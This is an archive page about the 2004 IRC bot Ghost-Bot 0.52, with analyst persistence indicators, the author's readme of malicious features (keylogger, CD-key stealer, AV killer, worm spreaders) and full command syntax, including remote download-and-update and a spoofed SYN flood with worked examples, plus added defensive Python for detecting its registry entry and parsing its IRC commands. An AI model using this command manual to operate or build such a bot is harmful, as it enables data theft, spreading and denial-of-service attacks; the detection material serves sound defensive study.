.: Ghost-Bot 0.52 :.
Released 18 years, 5 months ago. Mar 2004
By Positron
Additional Details
- Coded by: Positron
- Version: Ghost-Bot 0.52
- Release date: Mar 2004 (18 years, 5 months ago)
- Family: Ghost-Bot
- Category: Remote Access
MegaSecurity Notes
GhostBot:
- Dropped file: c:\WINDOWS\84Gkbi7V.exe (size: 34,616 bytes)
- Startup: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name "AVPTC32", data: C:\WINDOWS\84Gkbi7V.exe
- Does (try to) connect to an IRC server
- Tested on Windows XP, 13 November 2004
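A triage check for the persistence entry described in the notes above, written as an added example (it is not MegaSecurity's or the bot author's code). It parses the text of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"` collected from a suspect host and reports the exact value name and data from the notes as a match. The sample output below is constructed, not captured from a real host, and the extra rule that flags other 8-character alphanumeric executables directly in C:\WINDOWS is an assumption drawn from the single observed file name, so it only yields "suspicious", never "match".

```python
"""Look for Ghost-Bot's Run-key persistence in `reg query` output.

Added example; IOCs come from the MegaSecurity note (value name AVPTC32,
data C:\\WINDOWS\\84Gkbi7V.exe).  The "random 8-char name" rule is an
assumption from that one sample, not a documented property of the bot.
"""
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Indicators taken from the notes above.
IOC_VALUE_NAME = "AVPTC32"
IOC_DATA = r"C:\WINDOWS\84Gkbi7V.exe"

# Assumption: the dropper picks an 8-character alphanumeric name in %WINDIR%.
RANDOM_NAME_RE = re.compile(r"^c:\\windows\\[a-z0-9]{8}\.exe$", re.IGNORECASE)

# Constructed sample of `reg query` output (not from a real host); the
# "Updater" entry is invented to exercise the heuristic rule.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    AVPTC32    REG_SZ    C:\WINDOWS\84Gkbi7V.exe
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Updater    REG_SZ    C:\WINDOWS\Q1w2E3r4.exe
    VTTimer    REG_SZ    VTTimer.exe
"""


def parse_reg_query(text):
    """Yield (key, value_name, value_type, data) from `reg query` text.
    Key paths are unindented; values are indented and separated by tabs
    (XP) or runs of spaces (later Windows)."""
    key = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith((" ", "\t")):
            key = raw.strip()
            continue
        parts = re.split(r"\t|\s{2,}", raw.strip())
        if len(parts) >= 3 and parts[1].startswith("REG_"):
            yield key, parts[0], parts[1], "  ".join(parts[2:])


def classify(value_name, data):
    """'match' for the documented IOCs, 'suspicious' for the heuristic, else None."""
    if value_name == IOC_VALUE_NAME or data.lower() == IOC_DATA.lower():
        return "match"
    if RANDOM_NAME_RE.match(data.strip('"')):
        return "suspicious"
    return None


def find_ghostbot_persistence(text):
    """Return [(value_name, data, verdict)] for Run entries worth a look."""
    hits = []
    for key, name, _type, data in parse_reg_query(text):
        if key is None or key.lower() != RUN_KEY.lower():
            continue
        verdict = classify(name, data)
        if verdict:
            hits.append((name, data, verdict))
    return hits


if __name__ == "__main__":
    for name, data, verdict in find_ghostbot_persistence(SAMPLE_REG_QUERY):
        print(f"{verdict:10s} {name} -> {data}")
```

Run it against `reg query` output saved from the host (or pipe the output in and call `find_ghostbot_persistence` on it); a "match" verdict means the value name or data from the notes is present, while "suspicious" only means the heuristic fired and the file should be pulled for inspection.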
Author Words
;-----------------------------------------------------------------------------------
; BOT Name: Ghost-BOT 0.52
; ---------------------------------------------------------------------------------
; Features:
; - SpyBot compatible commands,
; - AV/FW killer,
; - CD-Key Stealer,
; - Mydoom spreader,
; - NetBIOS spreader,
; - Encrypted strings in EXE,
; - Web-server (--/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--),
; - API search engine by CRC32 (used only for important APIs),
; - KeyLogger (Keylog file can be downloaded from webserver too),
; - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire),
; - Prepend all .exe files in shared dirs if they are smaller than 5MB,
; - Support DCC SEND, DCC GET, DCC CHAT and topic commands.
;-----------------------------------------------------------------------------------

COMMANDS LIST: (Note: Only the "login" command is case sensitive)
--------------
login password (example: login hello)
delete [filename] (example: delete c:\windows\temp.exe)
execute [filename] (example: delete c:\windows\temp.exe)
rename [originalfile] [newfile] (example: rename c:\windows\temp.exe c:\windows\driver.exe)
makedir [dirname] (example: makedir c:\test\)
info (info: gives some info)
killprocess [processname] (example: killprocess mcafee.exe)
disconnect [sec.] (info: disconnects the bot for x sec.; if sec. is not given it disconnects the bot for 30 mins.)
quit (info: bot quits running)
download [url] [filename] (example: download --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- c:\driver.exe)
httpserver [Port] [root-dir] (example: httpserver 81 c:\)
listprocesses (info: lists all running processes)
op
get [filename] (example: get c:\command.com will trigger a dcc send on the remote pc)
raw [raw command] (example: raw PRIVMSG #ghostbot :hello)
list [path+filter] (example: list c:\*.*)
cdkeys (info: search CD-Keys on server's computer)
restart (info: restarts the server's computer)
shutdown (info: shuts down the server's computer)
ipscan [StartIP] [port] (example: ipscan 1.1.1.1 3137)
stopipscan (info: stop IP scanner)
uninstall (info: remove BOT)
startmydoom (info: restart MyDoom spreader)
stopmydoom (info: stop MyDoom spreader)
startavfwkiller {info: restart AV/FW killer}
stopavfwkiller {info: stop AV/FW killer}
starnetbios {info: (re)start netbios spreader}
stopnetbios {info: stop netbios spreader}
clone [srv.] [port] [chan] [number of clones] (example: clone 1.1.1.1 6667 #abc 4)
rawclones [command] (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone)
killclones (info: remove all clones)
stopsyn (info: stop syn flooder)
update [URL] (example: update --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--)

Syn Flooder command
-------------------
syn [victim] [options]

Options:
-S: Spoof host (0 is random (default))
-p: Separated list of dest ports (0 is random (default))
-s: Separated list of src ports (0 is random (default))
-n: Number of packets (0 is continuous (default))
-d: Delay (in ms) (default 0)

Example I:
syn --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- -p 21,23,80,110

On this attack:
- Victim: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--
- Source IP: Random
- Destination ports: 21 + 23 + 80 + 110
- Source ports: Random
- Count: Continuous
- Delay: 0 ms (no delay between packets)

Example II:
syn --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- -S --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- -p 21,80 -s 42,63 -n 1 -d 50

On this attack:
- Victim: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--
- Source IP/host: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--
- Destination ports: 21 + 80
- Source ports: 42 + 63
- Count: 1
  * Please note that 1 count will send the syn packets from every *
  * source port to every destination port. This means 4 packets   *
  * will be transmitted with a 1 count on this attack.             *
- Delay: 50 ms

Positron
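The command grammar in the readme above is what an analyst sees in an IRC capture when a herder drives the bot, so the following added example (not the bot author's code) parses PRIVMSG lines into Ghost-Bot commands and decodes the "syn" options, including the packets-per-count rule the readme spells out for Example II. Assumptions not taken from the readme: commands arrive as the text of ":nick!user@host PRIVMSG <target> :<command>" lines, port lists are comma-separated as in the readme's examples, and the sample log is constructed (the ".invalid" hostnames stand in for the hosts the readme redacts).

```python
"""Parser for Ghost-Bot 0.52 IRC commands (added example, not the bot's code).
Turns PRIVMSG lines into the commands the readme lists and decodes 'syn'
options, including how many packets a single count implies.
Assumptions: ':nick!user@host PRIVMSG <target> :<command>' framing, comma
separated port lists, constructed sample log (.invalid hosts are placeholders).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Command words as the readme spells them ("starnetbios" included);
# only "login" is case sensitive.
GHOSTBOT_COMMANDS = {
    "login", "delete", "execute", "rename", "makedir", "info", "killprocess",
    "disconnect", "quit", "download", "httpserver", "listprocesses", "op", "get",
    "raw", "list", "cdkeys", "restart", "shutdown", "ipscan", "stopipscan",
    "uninstall", "startmydoom", "stopmydoom", "startavfwkiller", "stopavfwkiller",
    "starnetbios", "stopnetbios", "clone", "rawclones", "killclones", "syn",
    "stopsyn", "update",
}

PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)\S*\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")


@dataclass
class SynSpec:
    """Decoded 'syn [victim] [options]'; 0 keeps the readme's meaning."""
    victim: str
    spoof: str = "0"                                           # -S, 0 = random
    dst_ports: List[int] = field(default_factory=lambda: [0])  # -p, 0 = random
    src_ports: List[int] = field(default_factory=lambda: [0])  # -s, 0 = random
    count: int = 0                                             # -n, 0 = continuous
    delay_ms: int = 0                                          # -d

    def packets_per_count(self) -> int:
        # One count sends from every source port to every destination port.
        return len(self.src_ports) * len(self.dst_ports)

    def total_packets(self) -> Optional[int]:
        # None = continuous flood (count 0), no upper bound.
        return None if self.count == 0 else self.count * self.packets_per_count()


def _port_list(arg: str) -> List[int]:
    return [int(p) for p in arg.split(",")]


def parse_syn(args: List[str]) -> SynSpec:
    """Parse the words after 'syn'. Flags are case sensitive: -S is the
    spoof host, -s the source port list."""
    if not args:
        raise ValueError("syn needs a victim")
    if len(args) % 2 == 0:  # victim plus flag/value pairs gives an odd length
        raise ValueError(f"missing value for {args[-1]}")
    spec = SynSpec(victim=args[0])
    setters = {
        "-S": lambda v: setattr(spec, "spoof", v),
        "-p": lambda v: setattr(spec, "dst_ports", _port_list(v)),
        "-s": lambda v: setattr(spec, "src_ports", _port_list(v)),
        "-n": lambda v: setattr(spec, "count", int(v)),
        "-d": lambda v: setattr(spec, "delay_ms", int(v)),
    }
    for flag, value in zip(args[1::2], args[2::2]):
        if flag not in setters:
            raise ValueError(f"unknown syn option {flag}")
        setters[flag](value)
    return spec


def parse_command(text: str):
    """Return (command, args) if text starts with a Ghost-Bot command, else None.
    Windows paths use backslashes, so plain whitespace splitting is used."""
    words = text.strip().split()
    if not words:
        return None
    if words[0] == "login":  # exact case only, per the readme
        return "login", words[1:]
    lowered = words[0].lower()
    if lowered != "login" and lowered in GHOSTBOT_COMMANDS:
        return lowered, words[1:]
    return None


def scan_irc_log(lines):
    """Return [(nick, target, command, args, SynSpec-or-None)] per command."""
    hits = []
    for line in lines:
        m = PRIVMSG_RE.match(line)
        parsed = parse_command(m.group("text")) if m else None
        if parsed:
            cmd, args = parsed
            hits.append((m.group("nick"), m.group("target"), cmd, args,
                         parse_syn(args) if cmd == "syn" else None))
    return hits


# Constructed sample capture (not real traffic).
SAMPLE_IRC_LOG = [
    ":herder!h@1.1.1.1 PRIVMSG #ghostbot :login hello",
    ":herder!h@1.1.1.1 PRIVMSG #ghostbot :LOGIN hello",     # wrong case: ignored
    ":herder!h@1.1.1.1 PRIVMSG #ghostbot :hello everyone",  # chatter, no command
    ":herder!h@1.1.1.1 PRIVMSG #ghostbot :SYN victim.invalid -S spoof.invalid"
    " -p 21,80 -s 42,63 -n 1 -d 50",
    ":herder!h@1.1.1.1 PRIVMSG #ghostbot :ipscan 1.1.1.1 3137",
]
```

Feeding `SAMPLE_IRC_LOG` to `scan_irc_log` yields three hits (login, syn, ipscan); the mixed-case "LOGIN" line is dropped because the readme makes only that command case sensitive, and the decoded syn spec reports 2 x 2 = 4 packets per count, which is the figure the readme's Example II gives.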
URLs and e-mails were automatically redacted (filtered) for readers' safety. However, the filter is not perfect and can't find all harmful elements. If you find something dangerous, including a file link, website, mail address or profanity, contact me immediately at sub7crew@protonmail.com. Thank you in advance.